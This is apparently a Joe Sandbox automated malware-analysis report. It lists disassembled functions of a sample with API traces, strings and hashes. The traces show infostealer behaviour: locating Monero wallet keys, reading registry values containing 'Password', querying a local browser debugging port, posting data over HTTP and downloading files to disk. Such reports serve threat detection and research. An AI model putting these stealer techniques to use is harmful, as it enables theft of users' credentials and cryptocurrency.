Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: d8bec970428073cf6ec4cbc59b09ffa759b31b549548e7bcf4fc66ef27a547a5
Instruction ID: 741fdb0546306804f524ee4e08b2aea9f849864388c8e0516508d47f484bafde
Opcode Fuzzy Hash: d8bec970428073cf6ec4cbc59b09ffa759b31b549548e7bcf4fc66ef27a547a5
Instruction Fuzzy Hash: 6B5151B1E501185BCB14EB60DD96BED733DAF54304F4045EEB20A62092EF346BD8CA6E

Function 00405000 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
HeapAlloc.KERNEL32(00000000), ref: 00405021
InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
memcpy.MSVCRT(00000000,?,00000001), ref: 004050DA
InternetCloseHandle.WININET(+aA), ref: 00405109
InternetCloseHandle.WININET(?), ref: 00405116

Strings

+aA, xrefs: 00405105, 0040508D, 00405090, 00405108
+aA, xrefs: 00405051, 00405134

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
String ID: +aA$+aA
API String ID: 3894370878-2425922966
Opcode ID: 680d6db2701a830b3541bb914142e2be9b5bc6df679bd0b26afa8e477f43dac8
Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
Opcode Fuzzy Hash: 680d6db2701a830b3541bb914142e2be9b5bc6df679bd0b26afa8e477f43dac8
Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D

Function 023F4B37 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D

Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AA1
Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AB8
Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4ACF
Part of subcall function 023F4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023F4AF0
Part of subcall function 023F4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 023F4B00

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 023F4BCC
StrCmpCA.SHLWAPI(?,006D6E80), ref: 023F4BF1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 023F4D71
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,00421AB8,00000000,?,006D6F14), ref: 023F509F
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 023F50BB
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 023F50CF
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 023F5100
InternetCloseHandle.WININET(00000000), ref: 023F5164
InternetCloseHandle.WININET(00000000), ref: 023F517C
HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 023F4DCC

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

InternetCloseHandle.WININET(00000000), ref: 023F5186

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID:
API String ID: 2402878923-0
Opcode ID: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
Instruction ID: ab04d963dfd03b49e0c8d4d58da79892173cf5541b63aaae3feb67c726f35c2c
Opcode Fuzzy Hash: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
Instruction Fuzzy Hash: 3912F372951328AACB15EB91DC95FEEB77AAF54701F5041AEE246620D0EF702F88CF50

Function 023F6537 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D

Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AA1
Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AB8
Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4ACF
Part of subcall function 023F4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023F4AF0
Part of subcall function 023F4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 023F4B00

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 023F6598
StrCmpCA.SHLWAPI(?,006D6E80), ref: 023F65BA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 023F65EC
HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 023F663C
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 023F6676
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 023F6688
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 023F66B4
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 023F6724
InternetCloseHandle.WININET(00000000), ref: 023F67A6
InternetCloseHandle.WININET(00000000), ref: 023F67B0
InternetCloseHandle.WININET(00000000), ref: 023F67BA

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID:
API String ID: 3074848878-0
Opcode ID: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
Instruction ID: b28758cf2eda0db73f63ba32414ca023dedc019617c76e6822729af8bb7a0eae
Opcode Fuzzy Hash: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
Instruction Fuzzy Hash: D6714471A00318EBDB14DF90DC89FEDB779AF44701F1041A9E6066B5D0EBB56A84CF51

Function 02409407 Relevance: 16.7, APIs: 11, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02409463

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
Instruction ID: 99cbba8816a3cafbdd3f7db7de2a391a679c81bb50ad98a0a4a2bcf7846ff493
Opcode Fuzzy Hash: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
Instruction Fuzzy Hash: 5A710A71E05208ABCB14EFE4DC84FEEB779BF48700F10851AF615A7294EB34A944CB61

Function 023F9E47 Relevance: 16.4, APIs: 13, Instructions: 141stringCOMMON

Download Yara Rule

APIs

Part of subcall function 023F9CB7: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 023F9CD1

memset.MSVCRT ref: 023F9E9A
lstrcat.KERNEL32(?,004212A8), ref: 023F9EAF
lstrcat.KERNEL32(?,00000000), ref: 023F9EC5
memset.MSVCRT ref: 023F9F01
lstrcat.KERNEL32(?,004212BC), ref: 023F9F16
lstrcat.KERNEL32(?,004212C4), ref: 023F9F28
lstrcat.KERNEL32(?,?), ref: 023F9F3C
lstrcat.KERNEL32(?,004212C8), ref: 023F9F4E
lstrcat.KERNEL32(?,?), ref: 023F9F62
lstrcat.KERNEL32(?,004212CC), ref: 023F9F74
lstrlen.KERNEL32(00000000), ref: 023F9F7E
lstrlen.KERNEL32(00000000), ref: 023F9F8D

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

memset.MSVCRT ref: 023F9FE5

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
String ID:
API String ID: 689835475-0
Opcode ID: e67822385d328e2dce11951795e88f3921dfec35951474a789e8be3019acb687
Instruction ID: f2c145b9e5e391d049e563a01f288bb0397bea93aed75b24d3d57b6e8151da3a
Opcode Fuzzy Hash: e67822385d328e2dce11951795e88f3921dfec35951474a789e8be3019acb687
Instruction Fuzzy Hash: 5C515175D00618EBCB14EBE0EC95FEE7739BF14302F404599F609A61A0EB759648CF61

Function 00409A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
InternetCloseHandle.WININET(00000000), ref: 00409AC7

Strings

http://localhost:9229/json, xrefs: 00409A9F
"ws://, xrefs: 00409B84
"webSocketDebuggerUrl":, xrefs: 00409B4B

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseHandle
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 3289985339-2144369209
Opcode ID: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
Instruction ID: 65c64d5f42ab2d525f7f9866baa54bb10b69c20dcdde589055b7f2aa2564e8b2
Opcode Fuzzy Hash: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
Instruction Fuzzy Hash: C0414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505BA191DBB8AEC0CF68

Function 00407630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407330: memset.MSVCRT ref: 00407374
Part of subcall function 00407330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9

lstrcatA.KERNEL32(00000000,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 004076A8
lstrcatA.KERNEL32(00000000, : ), ref: 004076BA
lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076EF
lstrcatA.KERNEL32(00000000,00421934), ref: 00407700
lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00407733
lstrcatA.KERNEL32(00000000,00421938), ref: 0040774D
task.LIBCPMTD ref: 0040775B

Strings

: , xrefs: 004076AE

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 0536b009d8054fa3c231f647c939fffcb73d7f139e9b4279ea2affdd8fc55253
Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
Opcode Fuzzy Hash: 0536b009d8054fa3c231f647c939fffcb73d7f139e9b4279ea2affdd8fc55253
Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96

Function 02401862 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 02401892

Part of subcall function 024091D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02409202

Part of subcall function 02409657: StrStrA.SHLWAPI(\nm,00000000,00000000,?,023FA1D8,00000000,006D6E5C,00000000), ref: 02409663

lstrcpy.KERNEL32(?,00000000), ref: 024018CE

Part of subcall function 02409657: lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,023FA1D8,00000000,006D6E5C), ref: 02409687
Part of subcall function 02409657: lstrlen.KERNEL32(00000000,?,023FA1D8,00000000,006D6E5C), ref: 0240969E
Part of subcall function 02409657: wsprintfA.USER32 ref: 024096BE

lstrcpy.KERNEL32(?,00000000), ref: 02401916
lstrcpy.KERNEL32(?,00000000), ref: 0240195E
lstrcpy.KERNEL32(?,00000000), ref: 024019A5
lstrcpy.KERNEL32(?,00000000), ref: 024019ED
lstrcpy.KERNEL32(?,00000000), ref: 02401A35
lstrcpy.KERNEL32(?,00000000), ref: 02401A7C
lstrcpy.KERNEL32(?,00000000), ref: 02401AC4

Part of subcall function 0240AD97: lstrlen.KERNEL32(023F51BC,?,?,023F51BC,00420DDF), ref: 0240ADA2
Part of subcall function 0240AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0240ADFC

strtok_s.MSVCRT ref: 02401C07

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
String ID:
API String ID: 4276352425-0
Opcode ID: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
Instruction ID: d458d0e8c35ce7f04e1e02dddc3ff500b463d4ea7e50c71aa6ee7f597a2a436b
Opcode Fuzzy Hash: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
Instruction Fuzzy Hash: AD7141B2D012189BCB15EB61DCC8EEE737AAF54700F0449AEE509A61C1EF759AC48F61

Function 00407330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407374
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9

Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB

task.LIBCPMTD ref: 004075B5

Strings

Password, xrefs: 00407461

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95

Function 024078F7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02407939
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02407976
GetProcessHeap.KERNEL32(00000000,00000104), ref: 024079FA
RtlAllocateHeap.NTDLL(00000000), ref: 02407A01
wsprintfA.USER32 ref: 02407A37

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Strings

:, xrefs: 02407953
C, xrefs: 02407943
\, xrefs: 02407957

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction ID: 0bbd086fb0c11fefcc276fc7a349e1b1bce8fe173da6eda3184ecd627be56d7f
Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction Fuzzy Hash: ED4161B1D05258ABDB10DF94CC85FDEBBB9AF48700F0441AAE509672C0D7756B84CFA6

Function 00418290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00A70BB0,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00A70BB0,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
__aulldiv.LIBCMT ref: 00418302
__aulldiv.LIBCMT ref: 00418310
wsprintfA.USER32 ref: 0041833C

Strings

@, xrefs: 004182DD
%d MB, xrefs: 00418333

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9

Function 024084F7 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006D6D60,00000000,?,00420E14,00000000,?,00000000), ref: 02408527
RtlAllocateHeap.NTDLL(00000000), ref: 0240852E
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 0240854F
__aulldiv.LIBCMT ref: 02408569
__aulldiv.LIBCMT ref: 02408577
wsprintfA.USER32 ref: 024085A3

Strings

@, xrefs: 02408544
pkm, xrefs: 02408592, 02408595

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: @$pkm
API String ID: 2774356765-1350193380
Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction ID: 15f207c08aa016554fbeade6c189d9e6c69bbe88a7d22220d17b99d087a57a68
Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction Fuzzy Hash: AD214DB1E44318ABDB00DBD5CD45FAEBBB9FB44B04F10451AF615BB2C0D77859408BA5

Function 004060F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
StrCmpCA.SHLWAPI(?,00A72600), ref: 00406197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
InternetCloseHandle.WININET(00412DB1), ref: 004062A3
InternetCloseHandle.WININET(00000000), ref: 004062B0

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 4287319946-0
Opcode ID: 1ca4e18fc22758868358a647b535e6204b6b56777c6f5e304cd5102df954997b
Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
Opcode Fuzzy Hash: 1ca4e18fc22758868358a647b535e6204b6b56777c6f5e304cd5102df954997b
Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59

Function 023F6357 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D

Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AA1
Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AB8
Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4ACF
Part of subcall function 023F4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023F4AF0
Part of subcall function 023F4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 023F4B00

InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 023F63C6
StrCmpCA.SHLWAPI(?,006D6E80), ref: 023F63FE
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 023F6446
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 023F646A
InternetReadFile.WININET(?,?,00000400,?), ref: 023F6493
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 023F64C1
CloseHandle.KERNEL32(?,?,00000400), ref: 023F6500
InternetCloseHandle.WININET(?), ref: 023F650A
InternetCloseHandle.WININET(00000000), ref: 023F6517

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

